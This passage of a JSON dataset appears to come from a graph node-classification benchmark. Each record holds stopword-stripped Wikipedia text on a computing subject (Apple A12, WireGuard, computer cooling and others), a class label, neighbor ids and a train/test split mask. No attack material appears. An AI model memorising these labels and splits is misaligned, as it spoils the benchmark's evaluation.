    "text": "Apple_A12:apple a12 apple a12 bionic 64-bit arm-based system chip soc designed apple inc first appeared iphone xs xs max xr 2019 versions ipad air ipad mini two high-performance cores claimed 15 faster 50 energy-efficient apple a11 four high-efficiency cores claimed use 50 less power energy-efficient cores a11 a12 features apple-designed 64-bit armv8.3-a six-core cpu two high-performance cores running 2.49 ghz called vortex four energy-efficient cores called tempest vortex cores 7-wide decode out-of-order superscalar design tempest cores 3-wide decode out-of-order superscalar design like mistral cores tempest cores based apple swift cores apple a6 a12 also integrates apple-designed four-core graphics processing unit gpu 50 faster graphics performance a11 a12 includes dedicated neural network hardware apple calls next-generation neural engine neural network hardware eight cores perform 5 trillion 8-bit operations per second unlike a11 neural engine third party apps access a12 neural engine a12 manufactured tsmc using 7 nm finfet process first ship consumer product contains 6.9 billion transistors die size a12 83.27 mm 5 smaller a11 manufactured package package pop together 4 gib lpddr4x memory iphone xs xs max 3 gb lpddr4x memory iphone xr ipad air 2019 ipad mini 2019 armv8.3 instruction set supports brings significant security improvement form pointer authentication mitigates exploitation techniques involving memory corruption jump-oriented-programming return-oriented-programming",
    "neighbors": [
      9732,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      4139,
      7211,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      8812,
      6258,
      10357,
      10361,
      4220,
      10365,
      638,
      6783,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      7833,
      666,
      5786,
      6815,
      7842,
      7844,
      4773,
      2735,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      4807,
      4810,
      1744,
      4821,
      3293,
      9952,
      2788,
      3301,
      6884,
      1772,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      6926,
      4879,
      784,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      9022,
      1346,
      8003,
      10562,
      6981,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      2023,
      10734,
      5616,
      6130,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4259,
    "label": 2,
    "text": "IdeaPad_tablets:ideapad tablets ideapad tablets lenovo brand consumer-oriented tablet computers designed home use entertainment opposed business-focused thinkpad tablet series devices sold certain countries china india new zealand sold lepad brand similar lephone series smartphones ideapad-branded tablets produced android windows operating systems ideapad brand gradually phased recent years replaced general tab brand android devices miix brand windows devices exception several distinctive hardware lines yoga series yoga tablet 2 pro 13-inch tablet built-in projector 9,600 mah battery lenovo claims last 15 hours continuous use display resolution 2,560 pixels 1,440 pixels 32 gigabytes built-in storage come standard expanded 64 gigabytes microsd card yoga tablet 2 pro like previous yoga tablets thin body thick cylindrical base thick base designed make holding device portrait mode comfortable device projector mounted projector resolution 854 pixels 480 pixels sound provided stereo speakers subwoofer but-in base lenovo a10 tablet 10.1-inch tablet computer runs android lenovo ideatab lynx released united states december 2012 lynx tablet sold 599 accutype keyboard base priced 149 lynx 11.6-inch tablet lynx without dock 11.85 inches 7.4 inches 0.37 inches weighs 1.41 pounds approximately weight thickness third generation apple ipad keyboard dock weighs 1.45 pounds total 2.86 pounds lynx runs full-version windows 8 opposed windows rt lynx uses 1.8 ghz dual-core clovertrail intel atom z2760 processor 2gb memory either 32gb 64gb emmc flash storage 11.6-inch in-plane switching display resolution 1,366 x 768 resolution supports five-point capacitive multitouch micro-usb micro-hdmi ports microsd card slot lynx table keyboard dock two standard usb 2.0 ports lynx also bluetooth 4.0 802.11b/g/n wi-fi networking stereo speakers dual microphones 2-megapixel front-facing webcam review lynx cnet wrote real question lynx stand one answer might weight despite 11.6-inch screen tablet felt shockingly light held lenovo launch event although lenovo says 1.44 pounds lynx tablet portion closer feel kindle ipad larger display either keyboard dock takes away lynx airiness course although two least feel solidly linked use together latch secure n't worry accidentally dislodging screen also happy responsiveness lynx touchscreen although n't get chance really challenge five minute hands-on ideapad k2 ideapad k2010 1920x1200 pixel 10.1-inch ips panel tablet tegra 3 running 1.7 ghz possibly overclocked 2gb ram fingerprint scanner keyboard dock known lepad k2 lepad k2010 china ideapad k2 meant high-end gamers business users lenovo displayed tablet new product showcase india ideatab a1 1024x600 7-inch display tablet android 2.3 4.0 ideatab s2109 1024 x 768 pixels 4:3 aspect ratio 9.7-inch ips display omap 4430 soc dual core arm cortex a9 1 ghz sgx540 powervr gpu 1gb ram 3 versions 8 16 32 gb included storage capacity android 4.0 ideatab s2110 10.1-inch ips display tablet using qualcomm 1.5 ghz soc 1gb ram android 4.0 three tablets announced lenovo ideapad tablet line 2011 ideapad k1 a1 p1 ideapad k1 tablet announced july 2011 ideapad k1 tablet offered following specifications 30 free apps pre-loaded ideapad including angry birds hd kindle android documents go norton mobile security review gizmodo appreciated value ideapad k1 represented offer 32gb tablet 499 reviewer described tablet one attractive gizmodo reviewed “ matte chrome-colored side back trim deep red back panel ” ideapad k1 tablet featured interface improvements compared android 3.1 tablets gizmodo indicated battery life average android tablets 8 hours 3 minutes despite continuous web surfing wi-fi ideapad k1 summarized laptop magazine offering “ strong mix style performance uniquely compelling enhancements android 3.1 ui ” ideapad a1 tablet announced september 2011 pcworld review indicated a1 would first 7-inch tablet prices 200 less reviewer stated low price achieved reduction storage capacity functionality basic unit offered 2gb internal storage variants storage would made available a1 contained micro sd card slot allowed expansion 32gb a1 tablet powered single-core 1 ghz cortex a8 processor suggested reviewer single-core cpu may reason honeycomb board may explain lenovo achieve aggressive price feature indicated notable tablet price capacitive touch screen contrast resistive touch screen found value tablets display also offered higher-than average resolution 1024x600 pixels 170 pixels per inch ppi ppi value made display sharper even apple ipad 2 offered 132 ppi 9.7-inch screen fact a1 included android 2.3 gingerbread opposed android 3.2 honeycomb indicated point concern reviewer said companies incorporate android 2.2 2.3 achieved making significant customizations on-board apps well interface time announcement lenovo provided information customizations made ideapad a1 tablet 0.47 inches thin weighed 0.88 lbs a1 offered four different colors white black pink light blue feature a1 announced lenovo inclusion magnesium alloy roll cage protected internal components bumpers another key feature a1 gps require data connection used ideapad p1 tablet different ideapad k1 thinkpad tablets featured windows 7 operating system instead android 3.1 additionally unlike k1 thinkpad tablets p1 tablet included intel atom processor opposed nvidia tegra processor lenovo ideapad p1 windows tablet also preloaded adobe flash player 10.3 lenovo app shop microsoft security essentials lenovo app manager switch entertainment productivity apps like send email games watch online movies specifications ideapad p1 follows",
    "neighbors": [
      9863,
      5384,
      6539,
      6797,
      271,
      424,
      11062,
      1083,
      10303,
      11082,
      2635,
      10838,
      8921,
      1377,
      5606,
      3304,
      5481,
      2165,
      1400
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4260,
    "label": 7,
    "text": "Versive:versive versive machine learning startup based seattle washington us founded 2012 stephen purpura chris metcalfe company sells on-premises software cloud services professional service solutions help businesses automate human expertise september 2014 versive raised 42 million total investment company changed name context relevant versive 2017 october 2018 versive acquired esentire versive developed platform ingests data determines important creates problem-specific solution deployed continually learning proprietary high-performance machine learning technology accelerates deployment machine learning solutions problem-specific applications provide out-of-the-box experience reduces workload users building complicated models deployment options include public private clouds traditional servers hadoop clusters scale-out in-memory technology allows smart caching small huge datasets using computers parallelize efforts needed versive software applied various industries including finance information gathered technology aims help clients predict activity based observed trends technology used help security teams detect advanced cyber threats best emerging security product interop may 2017 useful calculating prices risks high speed system also detect fraud quickly versive launched 1.3 million seed funding madrona venture group seattle-based angel investor geoff entress initial investors included mike mcsherry cliff kushler mark illing swype/nuance startup received additional 1.5 million funding madrona november 2012 july 2013 versive raised total 7 million round series funding round included previous investors madrona entress well vulcan capital bloomberg beta may june september 2014 versive raised additional 35 million total investment three chunks goldman sachs bank america merrill lynch bloomberg beta new york life formation 8 madrona work-bench seattle angel investors versive partnered good harbor security risk management company founded richard a. clarke counterterrorism expert former cyber-security adviser bush administration clarke sits versive advisory board company helps versive repair security breaches ensure security compliance among services may 2014 versive named databeat innovation showdown april 2014 versive nominated pacific northwest startup year geekwire november 2013 versive selected geekwire collaboration museum history industry mohai bezos center innovation one seattle 10 recognizes promising young start-up companies within seattle region context relevant along nine companies recognized geekwire gala 4 december 2013 also unveiled sketch business concept giant-sized cocktail napkins",
    "neighbors": [
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 4261,
    "label": 1,
    "text": "Recordset:recordset recordset data structure consists group database records either come base table result query table concept common number platforms notably microsoft data access objects dao activex data objects ado recordset object contains fields collection properties collection time recordset object refers single record within set current record",
    "neighbors": [
      736,
      4647,
      2183,
      10737,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 4262,
    "label": 4,
    "text": "Computer_Security_Institute:computer security institute computer security institute csi professional membership organization serving practitioners information network computer-enabled physical security level system administrator chief information security officer founded 1974 csi used conduct two conferences per year — annual computer security conference exhibition csi sx internet entrepreneur jimmy wales keynote speaker csi ’ annual conference held november 6–8 2006 orlando florida csi perhaps best known annual csi/fbi computer crime security survey began conduct 1996 collaboration san francisco federal bureau investigation computer intrusion squad researchers robert h. smith school business university maryland fbi disappeared title study 2006 2007 reports 15th annual survey turned last released 2011 available general public information week csi staff including richard power testified expert witnesses united states senate committee hearings 2011 csi absorbed ubm although mention appears ubm wikipedia page september 2014 original csi website returns 404 file found error snapshots website found wayback time machine",
    "neighbors": [
      4348,
      3629
    ],
    "mask": "None"
  },
  {
    "node_id": 4263,
    "label": 1,
    "text": "Relational_calculus:relational calculus relational calculus consists two calculi tuple relational calculus domain relational calculus part relational model databases provide declarative way specify database queries contrast relational algebra also part relational model provides procedural way specifying queries relational algebra might suggest steps retrieve phone numbers names book stores supply sample book relational calculus would formulate descriptive declarative way relational algebra relational calculus essentially logically equivalent algebraic expression equivalent expression calculus vice versa result known codd theorem",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      2972,
      9112,
      7582,
      4255,
      9248,
      9631,
      9634,
      932,
      1447,
      2344,
      7080,
      10793,
      10413,
      10286,
      9397,
      10137,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      9411,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      4065,
      4066,
      9828,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      7412,
      1146,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 4264,
    "label": 3,
    "text": "Genesi:genesi genesi international group technology consulting companies united states mexico germany widely known designing manufacturing arm architecture power isa computing devices genesi group consists genesi usa inc. genesi americas llc genesi europe ug red efika bplan gmbh affiliated non-profit organization power2people genesi official linaro partner software development team instrumental moving linux arm architecture towards wider adoption hard-float application binary interface incompatible existing applications provides enormous performance gains many use cases main products genesi arm-based computers designed inexpensive quiet highly energy efficient custom open firmware compliant firmware products run multitude operating systems genesi designed maintains powerdeveloper online platform genesi products arm products manufacturers via powerdeveloper projects programs hundreds systems provided powerdeveloper community far thereby supporting open source development many countries linux distributions directly benefited programs include limited crux debian raspbian fedora gentoo opensuse ubuntu genesi funded development morphos operating system shifted focus towards linux 2004 however genesi remains main supporter operating system continues actively support user developer communities via morphzone social platform features discussion forums digital library software repository bounty system",
    "neighbors": [
      9921,
      8899,
      4581,
      8102,
      10501,
      10985,
      1515,
      9163,
      9964,
      7534,
      7151,
      7983,
      8625,
      10223,
      799
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4265,
    "label": 2,
    "text": "Leonard_H._Tower_Jr.:leonard h. tower jr. leonard len h. tower jr. born june 17 1949 free software activist one founding board members free software foundation contributed initial releases gcc gnu diff left free software foundation 1997 tower born june 17 1949 astoria queens new york city u.s 1971 tower received sb biology massachusetts institute technology time business manager tech student newspaper fsf first full-time paid employee tower mostly performed administrative tasks including managing mailing lists newsgroups requests information 1986 tower assisted richard stallman stallman initial plan base c compiler gnu project pastel compiler stallman obtained lawrence livermore lab tower worked rewriting existing code pastel variation pascal c stallman worked building new c front end stallman dropped plan discovered livermore compiler required much memory concluding would write new compiler scratch new compiler known gcc none pastel compiler used managed adapt use c front end written stallman released new gnu c compiler march 22 1987 acknowledging others contributions including tower wrote parts parser rtl generator rtl definitions vax machine description based ideas contributed jack davidson christopher fraser along mike haertel david hayes stallman tower also one initial co-authors gnu diff file comparison utility based published algorithm eugene myers late 1980s early 1990s tower spoke usenix conferences representative fsf tower early member league programming freedom 1991 tower one organization two active speakers along richard stallman",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      1939,
      802,
      3618,
      5555,
      9148,
      10687,
      10822,
      5703,
      5833,
      8524,
      8147,
      3674,
      2010,
      8671,
      10464,
      9579,
      8304,
      1394,
      8436
    ],
    "mask": "None"
  },
  {
    "node_id": 4266,
    "label": 4,
    "text": "Gervase_Markham_(programmer):gervase markham programmer gervase markham 21 june 1978 – 27 july 2018 british software engineer mozilla foundation lead developer bugzilla started contributing mozilla project 1999 became youngest paid employee mozilla.org age 23 graduated oxford university markham named paternal grandfather canon gervase markham 1910–2007 squire vicar morland near penrith related 16th-century poet writer gervase markham according times obituary elder gervase markham descendant william markham archbishop york 1710–1807 2006 google-o'reilly open source award best community activist also presented fosdem conference several years mozilla foundation activities bugzilla markham born-again christian undergoing treatment metastatic adenoid cystic carcinoma wrote relationship saw died 27 july 2018 long battle cancer",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 4267,
    "label": 9,
    "text": "CINT:cint cint command line c/c++ interpreter included object oriented data analysis package root although intended use faculties root cint also used standalone addition another program requires interpreter cint interpreted version c/c++ much way beanshell interpreted version java addition language interpreter offers certain bash-like shell features history tab-completion accomplish latter relies heavily reflection support built root user classes follow interfaces may also take advantage features language interpreted cint actually something hybrid c c++ covering 95 ansi c 85 c++ syntax however bit forgiving either language example operator codice_1 replaced codice_2 optional warning addition statements command line need end semi-colon although necessary statements macros cern switched cling c++ interpreter cint distributed standalone author cint latest home page",
    "neighbors": [
      5677,
      7919,
      9714,
      11442,
      9078,
      2045,
      10143
    ],
    "mask": "None"
  },
  {
    "node_id": 4268,
    "label": 4,
    "text": "WireGuard:wireguard wireguard free open-source software application communication protocol implements virtual private network vpn techniques create secure point-to-point connections routed bridged configurations run module inside linux kernel aims better performance ipsec openvpn tunneling protocols wireguard aims provide vpn simple highly effective review arstechnica observed popular vpn technologies openvpn ipsec often complex set disconnect easily absence configuration take substantial time negotiate reconnections may use outdated ciphers relatively massive code 400,000 600,000 lines code two examples given makes harder find bugs wireguard design seeks reduce issues making tunnel secure easier manage default using versioning cryptography packages focuses ciphers believed among secure current encryption methods also codebase around 4000 lines 1 either openvpn ipsec making security audits easier ars technica reported testing stable tunnels easy create wireguard compared alternatives commented would hard go back long reconnection delays compared wireguard nonsense instant reconnections wireguard utilizes curve25519 key exchange chacha20 encryption poly1305 data authentication siphash hashtable keys blake2s hashing supports layer 3 ipv4 ipv6 encapsulate v4-in-v6 vice versa written jason a. donenfeld published second version gnu general public license gpl may 2019 researchers inria published machine-checked proof protocol produced using cryptoverif proof assistant two early adopters wireguard vpn service providers mullvad azirevpn wireguard received donations mullvad private internet access nlnet foundation december 18 2018 protonmail protonvpn advocated continued research development wireguard technology indicating intent raise financial support oregon senator ron wyden recommended national institute standards technology nist evaluate wireguard replacement existing technologies like ipsec openvpn implementations wireguard protocol include",
    "neighbors": [
      2050,
      5254,
      10631,
      10889,
      4746,
      8331,
      6797,
      9722,
      8211,
      2709,
      11162,
      1435,
      3742,
      10016,
      9764,
      7983,
      10417,
      7859,
      2228,
      4791,
      823,
      8640,
      3777,
      9281,
      2884,
      5959,
      8265,
      11468,
      7376,
      7889,
      11606,
      2136,
      9048,
      6490,
      8283,
      5084,
      5469,
      5470,
      6364,
      10210,
      7139,
      9318,
      8039,
      8432,
      11248,
      5749,
      3322,
      8956,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4269,
    "label": 3,
    "text": "Sunway_(processor):sunway processor sunway shenwei chinese series computer microprocessors developed jiāngnán computing lab wuxi china uses reduced instruction set computing risc architecture details still sparse sunway series microprocessors developed mainly use military people republic china expressed online forums original microarchitecture believed inspired dec alpha sw-3 thought especially based alpha 21164 jack dongarra states follow-on sw26010 shenwei-64 instruction set related dec alpha instruction set n't say new instruction set three prior generations names although precise details instruction set unknown",
    "neighbors": [
      8450,
      398,
      1298,
      7699,
      9371,
      9851,
      8861,
      6815,
      3493,
      6311,
      682,
      9132,
      9391,
      2224,
      4144,
      1462,
      7234,
      6084,
      3014,
      3142,
      1480,
      6607,
      2517,
      10985,
      9964,
      8048,
      8944,
      757,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4270,
    "label": 3,
    "text": "Computer_cooling:computer cooling computer cooling required remove waste heat produced computer components keep components within permissible operating temperature limits components susceptible temporary malfunction permanent failure overheated include integrated circuits central processing units cpus chipset graphics cards hard disk drives components often designed generate little heat possible computers operating systems may designed reduce power consumption consequent heating according workload heat may still produced removed without attention cooling use heatsinks cooled airflow reduces temperature rise produced given amount heat attention patterns airflow prevent development hotspots computer fans widely used along heatsink fans reduce temperature actively exhausting hot air also exotic cooling techniques liquid cooling modern day processors designed cut reduce voltage clock speed internal temperature processor exceeds specified limit cooling may designed reduce ambient temperature within case computer exhausting hot air cool single component small area spot cooling components commonly individually cooled include cpu graphics processing unit gpu northbridge integrated circuits e.g. cpu gpu main generators heat modern computers heat generation reduced efficient design selection operating parameters voltage frequency ultimately acceptable performance often achieved managing significant heat generation operation temperature computer components rise heat transferred surroundings equal heat produced component thermal equilibrium reached reliable operation temperature must never exceed specified maximum permissible value unique component semiconductors instantaneous junction temperature rather component case heatsink ambient temperature critical cooling changed high temperatures significantly reduce life span cause permanent damage components heat output components sometimes exceed computer cooling capacity manufacturers often take additional precautions ensure temperatures remain within safe limits computer thermal sensors integrated cpu motherboard chipset gpu shut high temperatures detected prevent permanent damage although may completely guarantee long-term safe operation overheating component reaches point may throttled temperatures fall safe point using dynamic frequency scaling technology throttling reduces operating frequency voltage integrated circuit disables non-essential features chip reduce heat output often cost slightly significantly reduced performance desktop notebook computers throttling often controlled bios level throttling also commonly used manage temperatures smartphones tablets components packed tightly together little active cooling additional heat transferred hand user electronic computers became larger complex cooling active components became critical factor reliable operation early vacuum-tube computers relatively large cabinets could rely natural forced air circulation cooling however solid state devices packed much densely lower allowable operating temperatures starting 1965 ibm manufacturers mainframe computers sponsored intensive research physics cooling densely packed integrated circuits many air liquid cooling systems devised investigated using methods natural forced convection direct air impingement direct liquid immersion forced convection pool boiling falling films flow boiling liquid jet impingement mathematical analysis used predict temperature rises components possible cooling system geometry ibm developed three generations thermal conduction module tcm used water-cooled cold plate direct thermal contact integrated circuit packages package thermally conductive pin pressed onto helium gas surrounded chips heat conducting pins design could remove 27 watts chip 2000 watts per module maintaining chip package temperatures around systems using tcms 3081 family 1980 es/3090 1984 models es/9000 1990 ibm 3081 processor tcms allowed 2700 watts single printed circuit board maintaining chip temperature thermal conduction modules using water cooling also used mainframe systems manufactured companies including mitsubishi fujitsu cray-1 supercomputer designed 1976 distinctive cooling system machine height diameter consumed 115 kilowatts comparable average power consumption dozen western homes medium-sized car integrated circuits used machine fastest available time using emitter-coupled logic however speed accompanied high power consumption compared later cmos devices heat removal critical refrigerant circulated piping embedded vertical cooling bars twelve columnar sections machine 1662 printed circuit modules machine copper core clamped cooling bar system designed maintain cases integrated circuits refrigerant circulating final heat rejection water-cooled condenser piping heat exchangers pumps cooling system arranged upholstered bench seat around outside base computer 20 percent machine weight operation refrigerant later cray-2 densely packed modules seymour cray trouble effectively cooling machine using metal conduction technique mechanical refrigeration switched 'liquid immersion cooling method involved filling chassis cray-2 liquid called fluorinert fluorinert name implies inert liquid interfere operation electronic components components came operating temperature heat would dissipate fluorinert pumped machine chilled water heat exchanger performance per watt modern systems greatly improved many computations carried given power consumption possible integrated circuits 1980s 1990s recent supercomputer projects blue gene rely air cooling reduces cost complexity size systems compared liquid cooling fans used natural convection insufficient remove heat fans may fitted computer case attached cpus gpus chipset psu hard drives cards plugged expansion slot common fan sizes include 40 60 80 92 120 140 mm 200 230 250 300 mm fans sometimes used high-performance personal computers computer certain resistance air flowing chassis components sum smaller impediments air flow inlet outlet openings air filters internal chassis electronic components fans simple air pumps provide pressure air inlet side relative output side pressure difference moves air chassis air flowing areas lower pressure fans generally two published specifications free air flow maximum differential pressure free air flow amount air fan move zero back-pressure maximum differential pressure amount pressure fan generate completely blocked two extremes series corresponding measurements flow versus pressure usually presented graph fan model unique curve like dashed curves adjacent illustration fans installed parallel series combination parallel installation would fans mounted side side series installation would second fan line another fan inlet fan exhaust fan simplify discussion assumed fans model parallel fans provide double free air flow additional driving pressure series installation hand double available static pressure increase free air flow rate adjacent illustration shows single fan versus two fans parallel maximum pressure water doubled flow rate note air flow changes square root pressure thus doubling pressure increase flow 1.41 times twice might assumed another way looking pressure must go factor four double flow rate determine flow rate chassis chassis impedance curve measured imposing arbitrary pressure inlet chassis measuring flow chassis requires fairly sophisticated equipment chassis impedance curve represented solid red black lines adjacent curve determined actual flow chassis generated particular fan configuration graphically shown chassis impedance curve crosses fan curve slope chassis impedance curve square root function doubling flow rate required four times differential pressure particular example adding second fan provided marginal improvement flow configurations approximately shown plot second fan series would provide slightly better performance parallel installation equation required airflow chassis formula_1 simple conservative rule thumb cooling flow requirements discounting effects heat loss chassis walls laminar versus turbulent flow accounting constants specific heat density sea level formula_2 formula_3 example typical chassis 500 watts load maximum internal temperature environment i.e difference formula_4 would actual flow chassis free air rating fan dual piezo cooling jet patented ge uses vibrations pump air device initial device three millimeters thick consists two nickel discs connected either side sliver piezoelectric ceramics alternating current passed ceramic component causes expand contract 150 times per second nickel discs act like bellows contracted edges discs pushed together suck hot air expanding brings nickel discs together expelling air high velocity device bearings require motor thinner consumes less energy typical fans jet move amount air cooling fan twice size consuming half much electricity lower cost passive heat-sink cooling involves attaching block machined extruded metal part needs cooling thermal adhesive may used commonly personal-computer cpu clamp holds heat sink directly chip thermal grease thermal pad spread block fins ridges increase surface area heat conductivity metal much better air radiates heat better component protecting usually integrated circuit cpu fan-cooled aluminium heat sinks originally norm desktop computers nowadays many heat sinks feature copper base-plates entirely made copper dust buildup metal fins heat sink gradually reduces efficiency countered gas duster blowing away dust along unwanted excess material passive heat sinks commonly found older cpus parts get hot chipset low-power computers usually heat sink attached integrated heat spreader ihs essentially large flat plate attached cpu conduction paste layered dissipates spreads heat locally unlike heat sink spreader meant redistribute heat remove addition ihs protects fragile cpu passive cooling involves fan noise convection forces move air heatsink another growing trend due increasing heat density computer gpu fpga asics immerse entire computer select components thermally electrically conductive liquid although rarely used cooling personal computers liquid immersion routine method cooling large power distribution components transformers also becoming popular data centers personal computers cooled manner may require either fans pumps may cooled exclusively passive heat exchange computer hardware enclosure placed heat exchanger i.e heater core radiator might still needed though piping also needs placed correctly coolant used must sufficiently low electrical conductivity interfere normal operation computer liquid somewhat electrically conductive may cause electrical shorts components traces permanently damage reasons preferred liquid insulator dielectric conduct electricity wide variety liquids exist purpose including transformer oils synthetic single-phase dielectric coolants engineered fluids electrocool l 2-phase coolants 3m fluorinert non-purpose oils including cooking motor silicone oils successfully used cooling personal computers fluids used immersion cooling especially hydrocarbon based materials mineral oils cooking oils organic esters may degrade common materials used computers rubbers pvc thermal greases therefore critical review material compatibility fluids prior use mineral oil particular found negative effects pvc rubber-based wire insulation thermal pastes used transfer heat heat sinks processors graphic cards reported dissolve liquids however negligible impact cooling unless components removed operated air evaporation especially 2-phase coolants pose problem liquid may require either regularly refilled sealed inside computer enclosure powerful computers many features required less powerful computers ones fewer features used via epia motherboard cpu typically dissipates approximately 25 watts heat whereas capable pentium 4 motherboard cpu typically dissipates around 140 watts computers powered direct current external power supply brick generate heat inside computer case replacement cathode ray tube crt displays efficient thin-screen liquid crystal display lcd ones early twenty-first century reduces power consumption significantly component may fitted good thermal contact heatsink passive device large thermal capacity large surface area relative volume heatsinks usually made metal high thermal conductivity aluminium copper incorporate fins increase surface area heat relatively small component transferred larger heatsink equilibrium temperature component plus heatsink much lower component alone would heat carried away heatsink convective fan-forced airflow fan cooling often used cool processors graphics cards consume significant amounts electrical energy computer typical heat-generating component may manufactured flat surface block metal corresponding flat surface finned construction sometimes attached fan clamped component fill poorly conducting air gaps due imperfectly flat smooth surfaces thin layer thermal grease thermal pad thermal adhesive may placed component heatsink heat removed heat-sink convection extent radiation possibly conduction heat-sink thermal contact say metal case inexpensive fan-cooled aluminium heat sinks often used standard desktop computers heat-sinks copper base-plates made copper better thermal characteristics aluminium copper heat-sink effective aluminium unit size relevant regard high-power-consumption components used high-performance computers passive heat sinks commonly found older cpus parts dissipate much power chipset computers low-power processors equipment silent operation critical fan noise unacceptable usually heat-sink clamped integrated heat spreader ihs flat metal plate size cpu package part cpu assembly spreads heat locally thin layer thermal compound placed compensate surface imperfections spreader primary purpose redistribute heat heat-sink fins improve efficiency several brands ddr2 ddr3 ddr4 upcoming ddr5 dram memory modules fitted finned heatsink clipped onto top edge module technique used video cards use finned passive heatsink gpu dust tends build crevices finned heatsinks particularly high airflow produced fans keeps air away hot component reducing cooling effectiveness however removing dust restores effectiveness peltier junctions generally around 10-15 efficient ideal refrigerator carnot cycle compared 40–60 achieved conventional compression cycle systems reverse rankine systems using compression/expansion due lower efficiency thermoelectric cooling generally used environments solid state nature moving parts low maintenance compact size orientation insensitivity outweighs pure efficiency modern tecs use several stacked units composed dozens hundreds thermocouples laid next allows substantial amount heat transfer combination bismuth tellurium commonly used thermocouples active heat pumps consume power tecs produce temperatures ambient impossible passive heatsinks radiator-cooled liquid cooling heatpipe hsfs however pumping heat peltier module typically consume electric power heat amount pumped liquid cooling highly effective method removing excess heat common heat transfer fluid desktop pcs distilled water advantages water cooling air cooling include water higher specific heat capacity thermal conductivity principle used typical active liquid cooling system computers identical used automobile internal combustion engine water circulated water pump waterblock mounted cpu sometimes additional components gpu northbridge heat exchanger typically radiator radiator usually cooled additionally means fan besides fan could possibly also cooled means peltier cooler although peltier elements commonly placed directly top hardware cooled coolant used conduct heat away hot side peltier element coolant reservoir often also connected system besides active liquid cooling systems passive liquid cooling systems also sometimes used systems often discard fan water pump hence theoretically increasing reliability system and/or making quieter active systems downsides systems however much less efficient discarding heat thus also need much coolant -and thus much bigger coolant reservoir- giving time coolant cool liquids allow transfer heat parts cooled air making liquid cooling suitable overclocking high performance computer applications compared air cooling liquid cooling also influenced less ambient temperature liquid cooling comparatively low noise-level compares favorably active cooling become quite noisy disadvantages liquid cooling include complexity potential coolant leak leaked water importantly additives added water damage electronic components comes contact need test repair leaks makes complex less reliable installations notably first major foray field liquid-cooled personal computers general use high-end versions apple power mac g5 ultimately doomed propensity coolant leaks. ref name= powermac g5 coolant leaks/repairs /ref air-cooled heat sink generally much simpler build install maintain water cooling solution although cpu-specific water cooling kits also found may easy install air cooler limited cpus however liquid cooling gpu cards also possible originally limited mainframe computers liquid cooling become practice largely associated overclocking form either manufactured kits form do-it-yourself setups assembled individually gathered parts past years seen increase popularity liquid cooling pre-assembled moderate high performance desktop computers sealed closed-loop systems incorporating small pre-filled radiator fan waterblock simplify installation maintenance water cooling slight cost cooling effectiveness relative larger complex setups liquid cooling typically combined air cooling using liquid cooling hottest components cpus gpus retaining simpler cheaper air cooling less demanding components ibm aquasar system uses hot water cooling achieve energy efficiency water used heat buildings well since 2011 effectiveness water cooling prompted series all-in-one aio water cooling solutions aio solutions result much simpler install unit units reviewed positively review sites heat pipe hollow tube containing heat transfer liquid liquid absorbs heat evaporates one end pipe vapor travels cooler end tube condenses giving latent heat liquid returns hot end tube gravity capillary action repeats cycle heat pipes much higher effective thermal conductivity solid materials use computers heat sink cpu attached larger radiator heat sink heat sinks hollow attachment creating one large heat pipe transfers heat cpu radiator cooled using conventional method method expensive usually used space tight small form-factor pcs laptops fan noise tolerated audio production efficiency method cooling many desktop cpus gpus well high end chipsets use heat pipes addition active fan-based cooling remain within safe operating temperatures cooling technology development kronos thorn micro technologies employs device called ionic wind pump also known electrostatic fluid accelerator basic operating principle ionic wind pump corona discharge electrical discharge near charged conductor caused ionization surrounding air corona discharge cooler developed kronos works following manner high electric field created tip cathode placed one side cpu high energy potential causes oxygen nitrogen molecules air become ionized positively charged create corona halo charged particles placing grounded anode opposite end cpu causes charged ions corona accelerate towards anode colliding neutral air molecules way collisions momentum transferred ionized gas neutral air molecules resulting movement gas towards anode advantages corona-based cooler lack moving parts thereby eliminating certain reliability issues operating near-zero noise level moderate energy consumption soft cooling practice utilizing software take advantage cpu power saving technologies minimize energy use done using halt instructions turn put standby state cpu subparts n't used underclocking cpu resulting lower total speeds useful overclocking cpu improve user experience rather increase raw processing power since prevent need noisier cooling contrary term suggests form cooling reducing heat creation undervolting practice running cpu component voltages device specifications undervolted component draws less power thus produces less heat ability varies manufacturer product line even different production runs product well components system processors often specified use voltages higher strictly necessary tolerance ensures processor higher chance performing correctly sub-optimal conditions lower-quality motherboard low power supply voltages certain limit processor function correctly although undervolting far typically lead permanent hardware damage unlike 